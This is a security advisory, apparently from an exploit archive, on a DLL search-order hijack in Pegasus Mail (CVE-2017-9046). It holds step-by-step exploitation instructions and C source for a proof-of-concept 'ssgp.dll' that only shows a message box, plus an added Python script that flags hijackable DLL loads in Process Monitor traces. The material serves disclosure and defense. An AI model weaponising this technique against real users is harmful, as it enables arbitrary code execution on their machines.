Exploit for windows platform in category remote exploits
[+] Credits: John Page AKA hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source: http://hyp3rlinx.altervista.org/advisories/PEGASUS-MAILTO-LINK-REMOTE-CODE-EXECUTION.txt
[+] ISR: APPARITIONSEC
Vendor:
=============
www.pmail.com
Product:
===========================
Pegasus "winpm-32.exe"
v4.72 build 572
Pegasus Mail: Pegasus Mail is a free, standards-based electronic mail client suitable for use by single or multiple users on single
computers or on local area networks. A proven product, it has served millions of users since it was released in 1990.
Vulnerability Type:
======================
Remote Code Execution
CVE Reference:
==============
CVE-2017-9046
Security Issue:
================
Pegasus Mail has a DLL load flaw that allows arbitrary code execution when an HTML "mailto:" link is clicked,
if a DLL named "ssgp.dll" exists on the victim's Desktop. This is a DLL search-order hijack: winpm-32.exe requests
"ssgp.dll" by bare file name rather than by full path, so the Windows loader walks its search order and, finding no
copy in the application or system directories, loads the one sitting in the process's current working directory,
which is evidently the Desktop when the mailto: handler is launched from the browser. Tested successfully using the
Internet Explorer web browser.
e.g.
<a href="mailto:[email protected]">Link text</a>
Place "ssgp.dll" on the Desktop, then visit the web page in Internet Explorer and click the mailto: link: the
arbitrary code in the DLL executes and Pegasus Mail (pmail) is then launched.
The user needs to have set up Pegasus Mail (PMAIL) with the "mailto:" link option during installation, so that the
browser hands mailto: links to winpm-32.exe.
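To confirm the search-order walk on a test machine rather than trusting the Desktop observation alone, capture winpm-32.exe with Process Monitor, export the trace as CSV and triage it with the script below. This is an added example and not code from the advisory or from Pegasus Mail; the embedded export is constructed to mirror the ssgp.dll lookup described above, the install path C:\PMAIL\Programs and the user name "victim" are assumptions, and the trusted-directory list is a deliberately minimal assumption that should be extended for the system under test.

```python
"""Triage a Process Monitor CSV export for DLL search-order hijacking.

Added example for this advisory, not code from the original page or from
Pegasus Mail. Assumes a Procmon CSV export with the default columns
(Time of Day, Process Name, PID, Operation, Path, Result, Detail); the
sample rows below are constructed, and the install path C:\\PMAIL\\Programs
and the user name "victim" are assumptions.
"""
import csv
import io
import ntpath

# Directories a standard user cannot write to, so a probe there is not
# attacker-controllable (assumption: default Windows layout on C:).
TRUSTED_PREFIXES = ("c:\\windows\\",)

# Constructed sample export (not a real capture): winpm-32.exe walks the
# default search order for ssgp.dll and finally loads it from the current
# working directory, the Desktop when launched from a mailto: link in IE.
SAMPLE_EXPORT = """\
"Time of Day","Process Name","PID","Operation","Path","Result","Detail"
"10:00:01.0000","winpm-32.exe","4120","CreateFile","C:\\PMAIL\\Programs\\ssgp.dll","NAME NOT FOUND","Desired Access: Read"
"10:00:01.0001","winpm-32.exe","4120","CreateFile","C:\\Windows\\SysWOW64\\ssgp.dll","NAME NOT FOUND","Desired Access: Read"
"10:00:01.0002","winpm-32.exe","4120","CreateFile","C:\\Windows\\System\\ssgp.dll","NAME NOT FOUND","Desired Access: Read"
"10:00:01.0003","winpm-32.exe","4120","CreateFile","C:\\Windows\\ssgp.dll","NAME NOT FOUND","Desired Access: Read"
"10:00:01.0004","winpm-32.exe","4120","CreateFile","C:\\Users\\victim\\Desktop\\ssgp.dll","SUCCESS","Desired Access: Read"
"10:00:01.0005","winpm-32.exe","4120","Load Image","C:\\Users\\victim\\Desktop\\ssgp.dll","SUCCESS","Image Base: 0x6a000000"
"10:00:01.0006","winpm-32.exe","4120","CreateFile","C:\\Windows\\SysWOW64\\wsock32.dll","SUCCESS","Desired Access: Read"
"""


def parse_procmon_csv(text):
    """Parse a Procmon CSV export into a list of row dicts keyed by column name."""
    return list(csv.DictReader(io.StringIO(text)))


def _under(path, prefix):
    """Case-insensitive 'path lies under prefix' test for Windows paths."""
    return path.lower().startswith(prefix.lower())


def is_trusted_dir(path):
    """True if the path lies in a directory the loader may legitimately probe."""
    return any(_under(path, p) for p in TRUSTED_PREFIXES)


def dll_hijack_candidates(rows, process_name, app_dir):
    """Return {dll_name: finding} for DLLs probed outside app_dir and the trusted set.

    The loader probes app_dir first, then the system directories, then the
    current working directory and PATH. A DLL that was never found in a safe
    directory but was probed in an untrusted one is hijackable; 'hijacked' is
    True when the trace shows it actually loaded from such a directory.
    """
    app_dir = app_dir.rstrip("\\") + "\\"
    probes = {}
    for r in rows:
        if r["Process Name"].lower() != process_name.lower():
            continue
        if r["Operation"] not in ("CreateFile", "Load Image"):
            continue
        path = r["Path"]
        if not path.lower().endswith(".dll"):
            continue
        probes.setdefault(ntpath.basename(path).lower(), []).append(
            (r["Operation"], path, r["Result"]))

    findings = {}
    for name, seq in probes.items():
        found_safe = any(
            res == "SUCCESS" and (_under(p, app_dir) or is_trusted_dir(p))
            for op, p, res in seq)
        # Preserve probe order, drop duplicates (CreateFile + Load Image rows).
        untrusted = list(dict.fromkeys(
            p for op, p, res in seq
            if not _under(p, app_dir) and not is_trusted_dir(p)))
        loaded_from = next(
            (p for op, p, res in seq if op == "Load Image" and res == "SUCCESS"), None)
        if untrusted and not found_safe:
            findings[name] = {
                "probed_untrusted": untrusted,
                "loaded_from": loaded_from,
                "hijacked": loaded_from is not None and loaded_from in untrusted,
            }
    return findings


if __name__ == "__main__":
    report = dll_hijack_candidates(
        parse_procmon_csv(SAMPLE_EXPORT), "winpm-32.exe", "C:\\PMAIL\\Programs")
    for dll, f in report.items():
        state = "HIJACKED" if f["hijacked"] else "hijackable"
        print(f"{dll}: {state}; untrusted probes: {f['probed_untrusted']}; "
              f"loaded from: {f['loaded_from']}")
```

Run it against a real export by replacing SAMPLE_EXPORT with the file contents; any DLL reported as "hijackable" but not "HIJACKED" is one the application looks for and never finds, which is the condition an attacker exploits by supplying the file in the working directory or on PATH.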
Exploit:
========
1) Set Pegasus Mail as the default email client, and select the "mailto:" link option during PMAIL installation.
2) Compile "ssgp.dll" as a DLL from the C code below.
#include <windows.h>
// Build a 32-bit DLL to match the 32-bit winpm-32.exe (a 64-bit DLL will not load), e.g. with MinGW:
//   gcc -c ssgp.c
//   gcc -shared -o ssgp.dll ssgp.o
BOOL APIENTRY DllMain(HINSTANCE hInst, DWORD reason, LPVOID reserved){
    switch (reason) {
    case DLL_PROCESS_ATTACH:
        /* Runs inside winpm-32.exe as soon as the loader maps the DLL */
        MessageBox(NULL, "Code Execution!", "APPARITIONSEC", MB_OK);
        break;
    }
    /* Report success so the load completes and Pegasus carries on normally */
    return TRUE;
}
3) Place "ssgp.dll" on the Desktop.
4) Create an HTML file containing the following in the web server root directory.
<a href="mailto:[email protected]">Pegasus Exploit POC</a>
5) Open the web page in Internet Explorer and click the malicious mailto: link.
Our code gets executed...
# 0day.today [2018-04-10] #